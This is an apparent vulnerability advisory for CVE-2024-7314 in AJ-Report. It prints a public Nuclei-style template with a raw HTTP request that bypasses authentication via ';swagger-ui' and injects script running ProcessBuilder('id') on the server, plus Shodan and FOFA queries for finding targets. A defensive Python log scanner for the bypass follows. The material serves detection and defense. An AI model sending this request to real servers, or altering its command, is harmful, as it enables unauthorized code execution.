CVE-2024-7314: AJ-Report < 1.4.1 - Remote Code Execution

Date: 2025-08-01 | Affected software: A J Report | PoC: Public

Vulnerability Description

AJ-Report before version 1.4.1 is affected by an authentication bypass vulnerability. A remote and unauthenticated attacker can append ";swagger-ui" to HTTP requests to bypass authentication and execute arbitrary Java code on the victim server through script engine injection in the validation rules functionality.

PoC Code [Public]

id: CVE-2024-7314

info:
  name: AJ-Report < 1.4.1 - Remote Code Execution
  author: ritikchaddha
  severity: critical
  description: |
    AJ-Report before version 1.4.1 is affected by an authentication bypass vulnerability. A remote and unauthenticated attacker can append ";swagger-ui" to HTTP requests to bypass authentication and execute arbitrary Java code on the victim server through script engine injection in the validation rules functionality.
  remediation: |
    Upgrade to AJ-Report version 1.4.1 or later which includes security fixes.
  reference:
    - https://github.com/vulhub/vulhub/tree/master/aj-report/CNVD-2024-15077
    - https://github.com/yuebusao/AJ-REPORT-EXPLOIT
    - https://xz.aliyun.com/t/14460
    - https://nvd.nist.gov/vuln/detail/CVE-2024-7314
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-280
    epss-score: 0.70098
    epss-percentile: 0.9863
    cve-id: CVE-2024-7314
    cpe: cpe:2.3:a:anji-plus:report:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: anji-plus
    product: report
    fofa-query: app="AJ-Report"
    shodan-query: http.title:"AJ-Report"
  tags: cve,cve2024,aj-report,anji-plus,rce,swagger,vkev

http:
  - raw:
      - |
        POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json;charset=UTF-8

        {"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
          - 'data":'
        condition: and

      - type: word
        part: content_type
        words:
          - "application/json"

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"
# digest: 4b0a00483046022100cdcd797210ca1889c94d6849675e8add14a8b93bb0af578f064173e273a9b0aa022100c542782810efff942059b630dee74f73e4cdede8d62d300d42bf4dd97d6085c1:922c64590222798bb761d5b6d8e72950
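
For defenders, a log check for the ";swagger-ui" bypass described above. This is an added example, not part of the original template or of AJ-Report. It assumes combined-format access logs; the sample lines, the /hypothetical/route path and the function names are constructed for illustration.

```python
import re
from urllib.parse import unquote, urlsplit

# Request line and status inside a combined-format access log entry.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+" (?P<status>\d{3})')
SCRIPT_ENDPOINT = "/dataSetParam/verification"  # endpoint used by the template on this page
MARKER = "swagger-ui"                            # path-parameter value named in the advisory


def classify_target(target):
    """Return None for benign targets, else 'bypass' or 'bypass+script-endpoint'."""
    path = urlsplit(target).path
    for _ in range(3):  # decode repeatedly so %3b and %253b forms of ';' are seen
        path, previous = unquote(path), path
        if path == previous:
            break
    segments = path.split("/")
    # A path parameter is whatever follows ';' inside one segment.
    params = [p.lower() for seg in segments for p in seg.split(";")[1:]]
    if not any(MARKER in p for p in params):
        return None
    # Drop path parameters to recover the underlying route.
    route = "/".join(seg.split(";")[0] for seg in segments).rstrip("/")
    if route.lower() == SCRIPT_ENDPOINT.lower():
        return "bypass+script-endpoint"
    return "bypass"


def scan(lines):
    """Return (method, target, status, verdict) for each suspicious log line."""
    hits = []
    for line in lines:
        m = REQUEST_RE.search(line)
        verdict = classify_target(m.group("target")) if m else None
        if verdict:
            hits.append((m.group("method"), m.group("target"), int(m.group("status")), verdict))
    return hits


# Constructed sample lines (documentation addresses), not captured traffic.
SAMPLE = [
    '192.0.2.10 - - [01/Aug/2025:10:00:00 +0000] "GET /swagger-ui/index.html HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Aug/2025:10:00:05 +0000] "POST /dataSetParam/verification;swagger-ui/ HTTP/1.1" 200 96',
    '192.0.2.11 - - [01/Aug/2025:10:00:09 +0000] "GET /hypothetical/route%3Bswagger-ui HTTP/1.1" 200 143',
    '192.0.2.12 - - [01/Aug/2025:10:00:12 +0000] "POST /dataSetParam/verification HTTP/1.1" 401 40',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A genuine /swagger-ui/ page request is not flagged because the marker is a path segment there, not a path parameter; a 200 status on a flagged line is the case to triage first.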
